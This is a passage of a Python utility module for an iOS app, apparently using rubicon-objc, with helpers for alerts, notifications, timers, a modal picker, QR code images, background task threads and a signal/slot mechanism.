actions: list = [ ['Ok'] ], # default has no callbacks and shows Ok button
cancel: str = None, # name of the button you want to designate as 'Cancel' (ends up being first)
destructive: str = None, # name of the button you want to designate as destructive (ends up being red)
style: int = UIAlertControllerStyleAlert, #or: UIAlertControllerStyleActionSheet
completion: Callable[[],None] = None, # optional completion function that gets called when alert is presented
animated: bool = True, # whether or not to animate the alert
localRunLoop: bool = False, # whether or not to create a local event loop and block until dialog finishes.. useful for full stop error messages and/or password dialogs
               uiTextFieldHandlers : list = None, # if you want to create custom UITextFields in this alert, and the alert's style is UIAlertControllerStyleAlert, pass a list of fully annotated callbacks taking an objc_id as arg and returning None, one for each desired text field you want to create
ipadAnchor : object = None # A CGRect -- use this on ipad to specify an anchor if using UIAlertControllerStyleActionSheet
) -> ObjCInstance:
if localRunLoop:
NSLog("\n***\n*** WARNING -- 'localRunLoop' on modal dialogs is pretty buggy, as it turns out. Please fix the calling code to not use it!\n***")
if not NSThread.currentThread.isMainThread:
raise Exception('utils.show_alert can only be called from the main thread!')
alert = UIAlertController.alertControllerWithTitle_message_preferredStyle_(title, message, style)
if uiTextFieldHandlers:
if style != UIAlertControllerStyleAlert:
raise ValueError('Cannot combine uiTextFieldHandlers with non-UIAlertControllerStyleAlert alerts!')
for h in uiTextFieldHandlers:
alert.addTextFieldWithConfigurationHandler_(Block(h)) # let's hope h is a callable of the right type with the right number of args else exception will be thrown here
if type(actions) is dict:
acts = []
for k in actions.keys():
if actions[k] is not None:
acts.append([k,*actions[k]])
else:
                acts.append([k])
actions = acts
ct=0
fun_args_dict = dict()
got_callback = False
for i,arr in enumerate(actions):
has_callable = False
fun_args = []
if type(arr) is list or type(arr) is tuple:
actTit = arr[0]
fun_args = arr[1:]
has_callable = True
else:
actTit = arr
style = UIAlertActionStyleCancel if actTit == cancel else UIAlertActionStyleDefault
style = UIAlertActionStyleDestructive if actTit == destructive else style
def onAction(act_in : objc_id) -> None:
act = ObjCInstance(act_in)
fargs = fun_args_dict.get(act.ptr.value,[])
nonlocal got_callback
got_callback = True
if len(fargs):
#print("Calling action...")
fargs[0](*fargs[1:])
act = UIAlertAction.actionWithTitle_style_handler_(actTit,style,onAction)
fun_args_dict[act.ptr.value] = fun_args
alert.addAction_(act)
ct+=1
def onCompletion() -> None:
#print("On completion called..")
nonlocal got_callback, alert
if not actions: got_callback = True
if completion is not None:
#print("Calling completion callback..")
sig = signature(completion)
if len(sig.parameters) > 0:
completion(alert.ptr)
else:
completion()
if is_ipad() and alert.preferredStyle == UIAlertControllerStyleActionSheet:
popover = alert.popoverPresentationController()
if isinstance(ipadAnchor, UIBarButtonItem):
popover.barButtonItem = ipadAnchor
else:
popover.sourceView = vc.view
if isinstance(ipadAnchor, CGRect):
rect = ipadAnchor
else:
rect = vc.view.frame
rect = CGRectMake(rect.size.width/2.0,rect.size.height/4.0,0.0,0.0)
popover.sourceRect = rect
vc.presentViewController_animated_completion_(alert,animated,onCompletion)
if localRunLoop:
while not got_callback:
NSRunLoop.currentRunLoop().runUntilDate_(NSDate.dateWithTimeIntervalSinceNow_(0.1))
return None
return alert
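# A minimal usage sketch for show_alert (the view controller and the callback here are
# hypothetical, not part of this module): each entry in 'actions' is either a bare
# title or a [title, callable, *args] list, and 'cancel' / 'destructive' pick the
# button styling by title.
def _example_show_alert(vc : ObjCInstance) -> ObjCInstance:
    def on_ok() -> None:
        NSLog("user confirmed")
    return show_alert(vc = vc, title = _("Confirm"), message = _("Proceed?"),
                      actions = [ [ _('OK'), on_ok ], [ _('Cancel') ] ],
                      cancel = _('Cancel'))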
# Useful for doing a "Please wait..." style screen that takes itself offscreen automatically after a delay
# (may end up using this for some info alerts.. not sure yet)
def show_timed_alert(vc : ObjCInstance, title : str, message : str,
timeout : float, style : int = UIAlertControllerStyleAlert, animated : bool = True) -> ObjCInstance:
assert NSThread.currentThread.isMainThread
alert = None
def completionFunc() -> None:
def dismisser() -> None:
vc.dismissViewControllerAnimated_completion_(animated,None)
call_later(timeout, dismisser)
alert=show_alert(vc=vc, title=title, message=message, actions=[], style=style, completion=completionFunc)
return alert
# Useful for showing an alert with a single UITextField for user input of data
def show_tf_alert(vc : ObjCInstance, title : str, message : str,
completion : Callable[[],None] = None, placeholder : str = "Tap to input", text : str = "",
adjustsFontSizeToFitWidth = True, minimumFontSize = 9.0, clearButtonAlwaysVisible = True,
                  onOk : Callable[[str],None] = None, onCancel : Callable[[],None] = None, animated : bool = True,
secureTextEntry = False, autocapitalizationType = UITextAutocapitalizationTypeNone,
autocorrectionType = UITextAutocorrectionTypeNo, spellCheckingType = UITextSpellCheckingTypeNo) -> ObjCInstance:
tf = None
def SetupTF(tfo : objc_id) -> None:
nonlocal tf
tf = ObjCInstance(tfo).retain() # need to retain it because it will get released when dialog goes away, but we want its data in MyOnOk below..
tf.placeholder = placeholder if placeholder else ''
tf.adjustsFontSizeToFitWidth = adjustsFontSizeToFitWidth
tf.minimumFontSize = minimumFontSize
tf.clearButtonMode = UITextFieldViewModeAlways if clearButtonAlwaysVisible else UITextFieldViewModeWhileEditing
tf.secureTextEntry = secureTextEntry
tf.autocapitalizationType = autocapitalizationType
tf.autocorrectionType = autocorrectionType
tf.spellCheckingType = spellCheckingType
tf.text = text if text else ''
def MyOnCancel() -> None:
nonlocal tf
tf.release()
tf = None
if callable(onCancel):
onCancel()
def MyOnOk() -> None:
nonlocal tf
userInput = tf.text
tf.release()
tf = None
if callable(onOk):
onOk(userInput)
return show_alert(vc = vc, title = title, message = message, completion = completion, cancel = _('Cancel'), animated = animated,
uiTextFieldHandlers = [ SetupTF ], actions = [ [ _('OK'), MyOnOk ], [ _('Cancel'), MyOnCancel ] ])
###################################################
### Calling callables later or from the main thread
###################################################
def do_in_main_thread(func : Callable, *args) -> Any:
if NSThread.currentThread.isMainThread:
return func(*args)
else:
def VoidFun() -> None:
func(*args)
HelpfulGlue.performBlockInMainThread_sync_(VoidFun, False)
return None
def do_in_main_thread_sync(func : Callable, *args) -> Any:
if NSThread.currentThread.isMainThread:
return func(*args)
else:
def VoidFun() -> None:
func(*args)
HelpfulGlue.performBlockInMainThread_sync_(VoidFun, True)
return None
def do_in_main_thread_async(func : Callable, *args) -> None:
def VoidFun() -> None:
func(*args)
HelpfulGlue.performBlockInMainThread_sync_(VoidFun, False)
def call_later(timeout : float, func : Callable, *args) -> ObjCInstance:
timer = None
if not NSThread.currentThread.isMainThread:
# NB: From NSRunLoop docs -- messing with the run loop from another thread is bad bad bad since NSRunLoop is not thread safe
        # so we force this scheduling of the NSTimer to happen on the main thread... using dispatch_queue tricks in HelpfulGlue.
#NSLog("****** WARNING WARNING WARNING -- utils.call_later() called from outside the main thread! FIXME!!!! ******")
def inMain() -> None:
nonlocal timer
timer = call_later(timeout, func, *args)
HelpfulGlue.performBlockInMainThread_sync_(inMain, True)
else:
def OnTimer(t_in : objc_id) -> None:
t = ObjCInstance(t_in)
func(*args)
if t: t.invalidate()
timer = NSTimer.timerWithTimeInterval_repeats_block_(timeout, False, OnTimer)
NSRunLoop.mainRunLoop().addTimer_forMode_(timer, NSDefaultRunLoopMode)
return timer
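# A minimal usage sketch (the callback is illustrative): schedule a callable on the
# main run loop after a delay; the returned NSTimer may be invalidated early to
# cancel the call.
def _example_call_later() -> ObjCInstance:
    def ping(msg : str) -> None:
        NSLog("deferred: %s", msg)
    return call_later(1.5, ping, "hello")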
###
### Modal picker stuff
###
class UTILSModalPickerHelper(UIViewController):
''' This class has this funny name because in the obj-c space, all class names are in the global namespace
and as this class really is a private class to utils.py, we name it using the UTILS prefix to keep things
isolated. '''
items = objc_property()
lastSelection = objc_property()
needsDismiss = objc_property()
@objc_method
def init(self) -> ObjCInstance:
self = ObjCInstance(send_super(__class__, self,'init'))
if self:
self.items = None
self.lastSelection = 0
self.needsDismiss = False
self.modalPresentationStyle = UIModalPresentationOverFullScreen
return self
@objc_method
def dealloc(self) -> None:
self.finished()
remove_all_callbacks(self)
self.needsDismiss = None
# print("UTILSModalPickerHelper dealloc")
send_super(__class__, self, 'dealloc')
@objc_method
def numberOfComponentsInPickerView_(self, p : ObjCInstance) -> int:
return 1
@objc_method
def pickerView_numberOfRowsInComponent_(self, p : ObjCInstance, component : int) -> int:
assert component == 0
return len(self.items)
@objc_method
def pickerView_didSelectRow_inComponent_(self, p : ObjCInstance, row : int, component : int) -> None:
assert component == 0 and row < len(self.items)
self.lastSelection = row
@objc_method
def pickerView_titleForRow_forComponent_(self, p : ObjCInstance, row : int, component : int) -> ObjCInstance:
txt = ''
if component == 0 and row < len(self.items): txt = self.items[row]
return txt
@objc_method
def onOk_(self, but : ObjCInstance) -> None:
# print ("Ok pushed")
cb = get_callback(self, 'onOk')
if callable(cb):
sig = signature(cb)
params = sig.parameters
if len(params) > 0:
cb(int(self.lastSelection if self.lastSelection else 0))
else:
cb()
self.finished()
@objc_method
def onCancel_(self, but : ObjCInstance) -> None:
# print ("Cancel pushed")
self.finished()
@objc_method
def finished(self) -> None:
if self.viewIfLoaded and self.needsDismiss:
self.dismissViewControllerAnimated_completion_(True, None)
self.items = None
self.lastSelection = None
self.needsDismiss = False
###################################################
### Modal picker
###################################################
def present_modal_picker(parentVC : ObjCInstance,
items : list,
selectedIndex : int = 0,
okCallback : Callable[[int],None] = None,
okButtonTitle : str = "OK",
cancelButtonTitle : str = "Cancel") -> ObjCInstance:
assert parentVC is not None and items is not None and len(items)
if not isinstance(items, list):
items = list(items) # will raise if not compatible type
helper = UTILSModalPickerHelper.new().autorelease()
objs = NSBundle.mainBundle.loadNibNamed_owner_options_("ModalPickerView",helper,None)
if not objs: raise Exception("Could not load ModalPickerView nib!")
mpv = helper.view # auto-attached by NIB loader above because connection was made in NIB to file's owner.view
p = mpv.viewWithTag_(200) # note UIPickerView p is auto-connected to helper as dataSource and delegate by NIB
okBut = mpv.viewWithTag_(1)
cancelBut = mpv.viewWithTag_(2)
cancelBut.layer.borderColor = uicolor_custom('nav').CGColor
helper.items = items
if okButtonTitle is not None: okBut.setTitle_forState_(okButtonTitle, UIControlStateNormal)
if cancelButtonTitle is not None: cancelBut.setTitle_forState_(cancelButtonTitle, UIControlStateNormal)
if okBut and cancelBut:
okBut.addTarget_action_forControlEvents_(helper, SEL(b'onOk:'), UIControlEventPrimaryActionTriggered)
cancelBut.addTarget_action_forControlEvents_(helper, SEL(b'onCancel:'), UIControlEventPrimaryActionTriggered)
else:
raise Exception('Picker NIB loaded but could not find the OK or Cancel button views! FIXME!')
if callable(okCallback): add_callback(helper, 'onOk', okCallback)
if selectedIndex > 0 and selectedIndex < len(items):
p.selectRow_inComponent_animated_(selectedIndex, 0, False)
helper.lastSelection = selectedIndex
parentVC.view.endEditing_(True) # NB: do not use setDisablesAutomaticKeyboardDismissal because it is missing on newer iOS! (caused an app crash) -- so we do this instead
parentVC.presentViewController_animated_completion_(helper, True, None)
helper.needsDismiss = True
return helper
###################################################
### Banner (status bar) notifications
###################################################
def show_notification(message : str,
                      duration : float = 2.0, # the duration is in seconds; may be None, but in that case you must specify a completion
color : tuple = None, # color needs to have r,g,b,a components -- length 4, or be a UIColor
textColor : tuple = None, # color needs to have r,g,b,a components or be a UIColor
font : ObjCInstance = None,
style : int = CWNotificationStyleStatusBarNotification,
animationStyle : int = CWNotificationAnimationStyleTop,
animationType : int = CWNotificationAnimationTypeReplace,
animationDuration : float = 0.25, # the amount of time to animate in and out the notif
onTapCallback : Callable[[],None] = None, # the function to call if user taps notification -- should return None and take no args
multiline : bool = False,
noTapDismiss : bool = False,
completion : callable = None, # if you want to use the completion handler, set duration to None
) -> ObjCInstance:
cw_notif = CWStatusBarNotification.new().autorelease()
already_dismissed = False
def onTap() -> None:
#print("onTap")
if onTapCallback is not None: onTapCallback()
if not cw_notif.notificationIsDismissing and not noTapDismiss:
def _compl() -> None:
nonlocal already_dismissed
if not already_dismissed:
already_dismissed = True
ios13_status_bar_workaround.pop()
cw_notif.dismissNotificationWithCompletion_(_compl)
if isinstance(color, UIColor):
pass
elif color is None or not isinstance(color, (tuple, list)) or len(color) != 4 or [c for c in color if type(c) not in [float,int] ]:
color = uicolor_custom('notif')
else:
color = UIColor.colorWithRed_green_blue_alpha_(*color)
if isinstance(textColor, UIColor):
pass
elif textColor is None or not isinstance(textColor, (tuple, list)) or len(textColor) != 4 or [c for c in textColor if type(c) not in [float,int] ]:
textColor = uicolor_custom('dark')
else:
textColor = UIColor.colorWithRed_green_blue_alpha_(*textColor)
if not isinstance(font, UIFont):
font = UIFont.systemFontOfSize_weight_(12, UIFontWeightMedium)
# set default blue color (since iOS 7.1, default window tintColor is black)
cw_notif.notificationLabelBackgroundColor = color
cw_notif.notificationLabelTextColor = textColor
cw_notif.notificationLabelFont = font
cw_notif.notificationStyle = style
cw_notif.notificationAnimationInStyle = animationStyle
cw_notif.notificationAnimationOutStyle = animationStyle
cw_notif.notificationAnimationType = animationType
cw_notif.notificationAnimationDuration = animationDuration
cw_notif.multiline = multiline
message = str(message)
duration = float(duration) if duration is not None else None
cw_notif.notificationTappedBlock = onTap
ios13_status_bar_workaround.push()
if duration is None and completion is not None:
def _compl() -> None: completion()
cw_notif.displayNotificationWithMessage_completion_(message, _compl)
else:
if duration is None: duration = 2.0
def _compl() -> None:
nonlocal already_dismissed
if not already_dismissed:
already_dismissed = True
ios13_status_bar_workaround.pop()
cw_notif.displayNotificationWithMessage_forDuration_dismissedCompletion_(message, duration, _compl)
return cw_notif
def dismiss_notification(cw_notif : ObjCInstance) -> None:
if cw_notif is not None and not cw_notif.notificationIsDismissing:
def _compl() -> None: ios13_status_bar_workaround.pop()
cw_notif.dismissNotificationWithCompletion_(_compl)
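# A minimal usage sketch: pop up a transient status-bar banner using the defaults
# above, keeping the returned notification around in case it needs to be taken down
# early via dismiss_notification().
def _example_show_notification() -> ObjCInstance:
    notif = show_notification(message = _("Operation complete"), duration = 2.0)
    return notif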
#######################################################
### NSLog emulation -- python wrapper for NSLog
#######################################################
NSLOG_SUPPRESS = False
def NSLogSuppress(b : bool) -> None:
global NSLOG_SUPPRESS
NSLOG_SUPPRESS = b
def NSLog(fmt : str, *args) -> None:
if NSLOG_SUPPRESS:
return
args = list(args)
if isinstance(fmt, ObjCInstance):
fmt = str(py_from_ns(fmt))
fmt = fmt.replace("%@","%s")
for i,a in enumerate(args):
if isinstance(a, ObjCInstance):
try:
args[i] = str(a.description)
except Exception as e0:
#print("Exception on description call: %s"%str(e0))
try:
args[i] = str(py_from_ns(a))
except Exception as e:
print("Cannot convert NSLog argument %d to str: %s"%(i+1,str(e)))
args[i] = "<Unknown>"
try:
formatted = ns_from_py("{}".format(fmt%tuple(args)))
# NB: we had problems with ctypes and variadic functions due to ARM64 ABI weirdness. So we do this.
HelpfulGlue.NSLogString_(formatted)
except Exception as e:
print("<NSLog Emul Exception> : %s"%(str(e)))
formatted = "[NSLog Unavailable] {}".format(fmt%tuple(args))
print(formatted)
####################################################################
# NS Object Cache
#
# Store frequently used objc instances in a semi-intelligent, auto-
# retaining dictionary, complete with automatic low-memory-warning
# detection.
####################################################################
class NSObjCache:
def __init__(self, maxSize : int = 4, name : str = "Unnamed"):
self._cache = dict()
maxSize = 4 if type(maxSize) not in [float, int] or maxSize < 1 else int(maxSize) # C-programmer paranoia. ;)
self._max = maxSize
self._name = name
self._last = None
def lowMemory(notificaton : ObjCInstance) -> None:
# low memory warning -- loop through cache and release all cached images
ct = 0
for k in self._cache.keys():
self._cache[k].release()
ct += 1
self._cache = dict()
self._last = None
if ct: NSLog("Low Memory: Flushed %d objects from '%s' NSObjCache."%(ct,self._name))
self._token = NSNotificationCenter.defaultCenter.addObserverForName_object_queue_usingBlock_(
UIApplicationDidReceiveMemoryWarningNotification,
UIApplication.sharedApplication,
None,
lowMemory
).retain()
def __del__(self):
while len(self): self.release1()
if self._token is not None:
NSNotificationCenter.defaultCenter.removeObserver_(self._token.autorelease())
self._token = None
def release1(self):
keez = list(self._cache.keys())
while len(keez): # this normally only iterates once
k = keez[random.randrange(len(keez))]
if len(keez) > 1 and k is not None and self._last is not None and k == self._last:
# never expire the 'latest' item from the cache, unless the cache is of size 1
continue
self._cache.pop(k).release()
if k == self._last: self._last = None
break # end after 1 successful iteration
def put(self, key, obj : ObjCInstance):
if self._cache.get(key,None) is not None: return
while len(self) >= self._max:
self.release1()
#print("NSObjCache %s expired an object from full cache"%(self._name))
self._cache[key] = obj.retain()
#print("Cache %s size now %d"%(self._name,len(self)))
def get(self, key) -> ObjCInstance: # returns None on cache miss
ret = self._cache.get(key, None)
#if ret is not None: print("NSObjCache %s hit"%(self._name))
#else: print("NSObjCache %s miss"%(self._name))
self._last = key
return ret
def __len__(self):
return len(self._cache)
#############################
# Shows a QRCode
#############################
_qr_cache = NSObjCache(10,"QR UIImage Cache")
def present_qrcode_vc_for_data(vc : ObjCInstance, data : str, title : str = "QR Code") -> ObjCInstance:
uiimage = get_qrcode_image_for_data(data)
qvc = UIViewController.new().autorelease()
qvc.title = title
iv = UIImageView.alloc().initWithImage_(uiimage).autorelease()
    iv.autoresizingMask = UIViewAutoresizingFlexibleWidth|UIViewAutoresizingFlexibleHeight|UIViewAutoresizingFlexibleLeftMargin|UIViewAutoresizingFlexibleRightMargin|UIViewAutoresizingFlexibleTopMargin|UIViewAutoresizingFlexibleBottomMargin
iv.contentMode = UIViewContentModeScaleAspectFit
iv.opaque = True
iv.backgroundColor = UIColor.whiteColor
gr = UITapGestureRecognizer.new().autorelease()
iv.addGestureRecognizer_(gr)
def ActionBlock(gr : objc_id) -> None:
def ShowIt() -> None: show_share_actions(vc = qvc, img = iv.image, ipadAnchor = iv.frame, objectName = _("Image"))
c1 = UIColor.whiteColor
c2 = UIColor.colorWithRed_green_blue_alpha_(0.0,0.0,0.0,0.3)
iv.backgroundColorAnimationFromColor_toColor_duration_reverses_completion_(c1, c2, 0.2, True, ShowIt)
gr.addBlock_(ActionBlock)
iv.userInteractionEnabled = True
qvc.view = iv
nav = tintify(UINavigationController.alloc().initWithRootViewController_(qvc).autorelease())
vc.presentViewController_animated_completion_(nav,True,None)
return qvc
def get_qrcode_image_for_data(data : str, size : CGSize = None) -> ObjCInstance:
global _qr_cache
if not isinstance(data, (str, bytes)):
        raise TypeError('argument to get_qrcode_image_for_data should be of type str or bytes!')
if isinstance(data, bytes): data = data.decode('utf-8')
uiimage = None
if not size: size = CGSizeMake(256.0,256.0)
key = "(%0.2f,%0.2f)[%s]"%(size.width,size.height,data)
uiimage = _qr_cache.get(key)
if uiimage is None:
#print("**** CACHE MISS for",key)
try:
qr = qrcode.QRCode(image_factory=qrcode.image.svg.SvgPathFillImage)
qr.add_data(data)
img = qr.make_image()
except qrcode.exceptions.DataOverflowError:
NSLog("Failed to generate QR image -- data too long! Defaulting to OvalX.png. Data length was: %d bytes",len(data))
return UIImage.imageNamed_("OvalX")
fname = ""
tmp, fname = tempfile.mkstemp()
img.save(fname)
os.close(tmp)
with open(fname, 'r') as tmp_file:
contents = tmp_file.read()
os.remove(fname)
uiimage = UIImage.imageWithSVGString_targetSize_fillColor_cachedName_(
contents,
size,
UIColor.blackColor,
None
)
_qr_cache.put(key, uiimage)
#else:
# print("**** CACHE HIT for",key)
return uiimage
#########################################################################################
# Poor man's signal/slot support
# For our limited ObjC objects which can't have Python attributes
#########################################################################################
_cb_map = dict()
def add_callback(obj : ObjCInstance, name : str, callback : Callable) -> None:
global _cb_map
if name is None: raise ValueError("add_callback: name parameter must be not None")
if callable(callback):
m = _cb_map.get(obj.ptr.value, dict())
m[name] = callback
_cb_map[obj.ptr.value] = m
else:
remove_callback(obj, name)
def remove_all_callbacks(obj : ObjCInstance) -> None:
global _cb_map
_cb_map.pop(obj.ptr.value, None)
def remove_callback(obj : ObjCInstance, name : str) -> None:
global _cb_map
if name is not None:
m = _cb_map.get(obj.ptr.value, None)
if m is None: return
m.pop(name, None)
if len(m) <= 0:
_cb_map.pop(obj.ptr.value, None)
else:
_cb_map[obj.ptr.value] = m
else:
remove_all_callbacks(obj)
def get_callback(obj : ObjCInstance, name : str) -> Callable:
global _cb_map
def dummyCB(*args) -> None:
pass
if name is None: raise ValueError("get_callback: name parameter must be not None")
return _cb_map.get(obj.ptr.value, dict()).get(name, dummyCB)
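# A minimal usage sketch (the object and slot name are illustrative): attach a python
# callable to a bridged ObjC instance under a name, look it up later (a no-op dummy is
# returned if nothing was registered), and clean up when the instance goes away.
def _example_callbacks(helper : ObjCInstance) -> None:
    add_callback(helper, 'onOk', lambda idx: NSLog("picked row %d", idx))
    get_callback(helper, 'onOk')(0)
    remove_all_callbacks(helper)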
#########################################################
# TaskThread Stuff
# -- execute a python task in a separate (Python) Thread
#########################################################
class TaskThread:
'''Thread that runs background tasks. Callbacks are guaranteed
to happen in the main thread.'''
Task = namedtuple("Task", "task cb_success cb_done cb_error")
def __init__(self, on_error=None):
self.on_error = on_error
self.tasks = queue.Queue()
self.worker = threading.Thread(target=self.run, name="TaskThread worker", daemon=True)
self.start()
def __del__(self):
#NSLog("TaskThread __del__")
if self.worker:
if self.worker.is_alive():
NSLog("TaskThread worker was running, force cancel...")
self.stop()
#self.wait()
self.worker = None
def start(self):
if self.worker and not self.worker.is_alive():
self.worker.start()
return True
elif not self.worker:
raise ValueError("The Thread worker was None!")
def add(self, task, on_success=None, on_done=None, on_error=None):
on_error = on_error or self.on_error
self.tasks.put(TaskThread.Task(task, on_success, on_done, on_error))
def run(self):
while True:
task = self.tasks.get()
if not task:
break
try:
result = task.task()
do_in_main_thread(self.on_done, result, task.cb_done, task.cb_success)
except:
do_in_main_thread(self.on_done, sys.exc_info(), task.cb_done, task.cb_error)
NSLog("Exiting TaskThread worker thread...")
def on_done(self, result, cb_done, cb):
# This runs in the main thread.
if cb_done:
cb_done()
if cb:
cb(result)
def stop(self):
if self.worker and self.worker.is_alive():
self.tasks.put(None)
def wait(self):
if self.worker and self.worker.is_alive():
self.worker.join()
self.worker = None
@staticmethod
def test():
def onError(result):
NSLog("onError called, result=%s",str(result))
tt = TaskThread(onError)
def onDone():
nonlocal tt
NSLog("onDone called")
tt.stop()
tt.wait()
NSLog("test TaskThread joined ... returning.. hopefully cleanup will happen")
tt = None # cleanup?
def onSuccess(result):
NSLog("onSuccess called, result=%s",str(result))
def task():
NSLog("In task thread.. sleeping once every second for 10 seconds")
for i in range(0,10):
NSLog("Iter: %d",i)
time.sleep(0.2)
return "Yay!"
tt.add(task, onSuccess, onDone, onError)
class WaitingDialog:
    '''Shows a please wait dialog whilst running a task. It is not
necessary to maintain a reference to this dialog.'''
def __init__(self, vc, message, task, on_success=None, on_error=None):
assert vc
self.vc = vc
self.thread = TaskThread()
def onPresented() -> None:
self.thread.add(task, on_success, self.dismisser, on_error)
#title = _("Please wait")
#self.alert=show_alert(vc = self.vc, title = title, message = message, actions=[], completion=onPresented)
self.alert = show_please_wait(vc = self.vc, message = message, completion=onPresented)
def __del__(self):
#print("WaitingDialog __del__")
pass
def wait(self):
self.thread.wait()
def on_finished(self) -> None:
self.thread.stop()
self.wait()
self.alert = None
self.thread = None
def dismisser(self) -> None:
def compl() -> None:
self.on_finished()
self.vc.dismissViewControllerAnimated_completion_(True, compl)
###
# NS -> py cache since our obj-c objects can't store python attributes :/
###
_nspy_dict = dict()
def nspy_get(ns : ObjCInstance) -> Any:
global _nspy_dict
return _nspy_dict.get(ns.ptr.value,None)
def nspy_put(ns : ObjCInstance, py : Any) -> None:
global _nspy_dict
_nspy_dict[ns.ptr.value] = py
def nspy_pop(ns : ObjCInstance) -> Any:
global _nspy_dict
return _nspy_dict.pop(ns.ptr.value,None)
def nspy_get_byname(ns : ObjCInstance, name : str) -> Any:
m = nspy_get(ns)
ret = None
if isinstance(m, dict):
ret = m.get(name,None)
return ret
def nspy_put_byname(ns : ObjCInstance, py : Any, name : str) -> None:
m = nspy_get(ns)
needPutBack = False
if m is None:
m = dict()
needPutBack = True
if isinstance(m, dict):
m[name] = py
if needPutBack: nspy_put(ns, m)
def nspy_pop_byname(ns : ObjCInstance, name : str) -> Any:
m = nspy_get(ns)
ret = None
if m and isinstance(m, dict):
ret = m.pop(name,None)
if not m: nspy_pop(ns) # clean up when dict is empty
return ret
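# A minimal usage sketch: stash arbitrary python data on a bridged ObjC instance
# (which cannot hold python attributes itself), read it back by name, and pop it when
# no longer needed. 'indent_override' is the key consumed by uitf_redo_attrs() above.
def _example_nspy(ns : ObjCInstance) -> None:
    nspy_put_byname(ns, 10.0, 'indent_override')
    NSLog("indent is %s", str(nspy_get_byname(ns, 'indent_override')))
    nspy_pop_byname(ns, 'indent_override')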
####################################################################
# Another take on signals/slots -- Python-only signal/slot mechanism
####################################################################
class PySig(PrintError):
Entry = namedtuple('Entry', 'func key is_ns')
def __init__(self):
self.clear()
def clear(self) -> None:
try:
del self.entries
except AttributeError:
pass
self.entries = list() # list of slots
def connect(self, func : Callable, key : Any = None) -> None:
        ''' Note: the func arg, for now, needs to take explicit args and no *args, **kwargs business as it's not yet supported.'''
if not callable(func):
raise ValueError("Passed-in arg to PySig connect is not a callable!")
is_ns = False
if isinstance(key, ObjCInstance):
is_ns = True
key = key.ptr.value
entry = PySig.Entry(func, key, is_ns)
self.entries.append(entry)
def disconnect(self, func_or_key : Any = None) -> None:
if func_or_key is None:
self.clear()
return
func = None
key = None
removeAll = False
if callable(func_or_key):
func = func_or_key
else:
key = func_or_key
if isinstance(key, ObjCInstance):
key = key.ptr.value
removeAll = True
removeCt = 0
keep = list()
for i,entry in enumerate(self.entries):
if (removeCt == 0 or removeAll) and ((key is not None and key == entry.key) or (func is not None and func == entry.func)):
removeCt += 1
else:
keep.append(entry)
self.entries = keep
#NSLog("Remove %d connections", removeCt)
if removeCt: return
name = "<Unknown NSObject>"
try:
name = str(func_or_key)
except:
print(str(sys.exc_info()[1]))
finally:
NSLog("PySig disconnect: *** WARNING -- could not find '%s' in list of connections!",name)
def emit_common(self, require_sync : bool, *args) -> None:
def doIt(entry, wasMainThread, *args) -> None:
try:
if not wasMainThread and (not self.entries or entry not in self.entries):
# entry was removed from underneath us before callback ran!
pass
else:
sig = signature(entry.func)
# call slot...
entry.func(*args[:len(sig.parameters)])
finally:
#if not wasMainThread and entry.is_ns:
# release iff NSObject..
# ObjCInstance(objc_id(entry.key)).release()
# NSLog(" *** NSObject release")
pass
isMainThread = bool(NSThread.currentThread.isMainThread)
# guard against slots requesting themselves to be removed while this loop is iterating
entries = self.entries.copy()
#if not isMainThread: # first, run through all entries that may be NSObjects and retain them
#for entry in entries:
# if it's an NSObject, retain it then release it in the embedded callback
#if entry.is_ns:
# NSLog(" *** NSObject retain")
# ObjCInstance(objc_id(entry.key)).retain()
# next, call the slots in the main thread, optionally releasing any nsobject retained above
for entry in entries:
if isMainThread:
doIt(entry, isMainThread, *args)
elif require_sync:
do_in_main_thread_sync(doIt, entry, isMainThread, *args)
else:
do_in_main_thread(doIt, entry, isMainThread, *args)
def emit(self, *args) -> None:
self.emit_common(False, *args)
def emit_sync(self, *args) -> None:
self.emit_common(True, *args)
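# Illustrative sketch (not executed): typical PySig usage. The slot's signature determines how many
# of the emitted args it receives; the names below (downloadFinished, on_done) are hypothetical.
#
#   downloadFinished = PySig()
#   def on_done(url, status): print("done:", url, status)
#   downloadFinished.connect(on_done)
#   downloadFinished.emit("https://example.com/x.png", 200)   # slots are invoked on the main thread
#   downloadFinished.disconnect(on_done)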
class MyNSObs(NSObject):
@objc_method
def dealloc(self) -> None:
#print("MyNSObs dealloc")
sig = nspy_pop(self)
if sig is not None:
#print("MyNSObs -- sig was found...")
sig.emit(sig.ptr)
sig.observer = None
else:
print("MyNSObs -- sig was None!")
send_super(__class__,self,'dealloc')
class NSDeallocObserver(PySig):
''' Provides the ability to observe the destruction of an objective-c object instance, and be notified of said
object's destruction on the main thread via our Qt-like 'signal' mechanism. For an example of this class's usefulness,
see the 'register_keyboard_callbacks' function later in this file.
Note that it is not necessary to keep a reference to this object around as it automatically gets associated with
internal data structures and auto-removes itself once the signal is emitted. The signal itself has 1 param, the objc_id
of the watched object. The watched object may or may not still be alive when the signal is emitted, however.'''
def __init__(self, ns : ObjCInstance, observer_class : MyNSObs = None):
if not isinstance(ns, (ObjCInstance, objc_id)):
raise ValueError("Argument for NSDeallocObserver must be an ObjCInstance or objc_id")
super().__init__()
self.ptr = ns.ptr if isinstance(ns, ObjCInstance) else ns
import rubicon.objc.runtime as rt
if observer_class is None: observer_class = MyNSObs
self.observer = observer_class.new().autorelease()
rt.libobjc.objc_setAssociatedObject(self.ptr, self.observer.ptr, self.observer.ptr, 0x301)
nspy_put(self.observer, self) # our NSObject keeps a strong reference to us
def dissociate(self) -> None:
self.disconnect()
import rubicon.objc.runtime as rt
rt.libobjc.objc_setAssociatedObject(self.ptr, self.observer.ptr, objc_id(0), 0x301)
'''
# This is here for debugging purposes.. Commented out as __del__ is dangerous if it has external dependencies
def __del__(self):
#print ("NSDeallocObserver __del__")
if self.observer:
print("NSDeallocObserver __del__: self.observer was not nil!")
nspy_pop(self.observer)
#super().__del__()
'''
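# Illustrative sketch (not executed): watch for an NSObject's destruction. The observer attaches itself
# to the watched object via an associated object, so no reference needs to be kept; 'someView' is hypothetical.
#
#   obs = NSDeallocObserver(someView)
#   obs.connect(lambda ptr: print("view with objc_id", ptr, "was deallocated"))
#   # ... when UIKit releases someView, the lambda fires on the main thread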
def set_namedtuple_field(nt : object, fieldname : str, newval : Any) -> object:
try:
d = nt._asdict()
except:
raise ValueError('set_namedtuple_field, first argument does not appear to be a valid namedtuple!')
if not isinstance(fieldname, str):
raise ValueError('set_namedtuple_field, fieldname (second arg) must be a string!')
if fieldname not in d:
raise ValueError('%s is not a field in namedtuple %s'%(str(fieldname),type(nt).__qualname__))
else:
d[fieldname] = newval
return type(nt)(**d)
